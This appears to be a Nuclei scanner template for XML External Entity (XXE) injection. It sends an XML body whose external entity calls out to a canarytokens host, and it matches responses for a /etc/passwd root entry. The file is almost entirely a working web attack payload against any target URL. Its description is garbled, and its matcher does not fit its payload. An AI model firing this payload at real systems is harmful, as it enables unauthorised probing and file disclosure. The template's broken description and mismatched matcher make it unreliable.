id: xxe

info:
  name: xxe to canary
  author: pelo
  severity: high
  description: |
     actionectory traversal via the header

  tags: xxe

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    body: <?xml version="1.0"?>
            <!DOCTYPE foo [<!ELEMENT foo (#ANY)>
               <!ENTITY xxe SYSTEM
                "http://dk7l6aogliio5m7zsytg6gm6i.canarytokens.com">]>
                 <foo>&xxe;</foo>
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

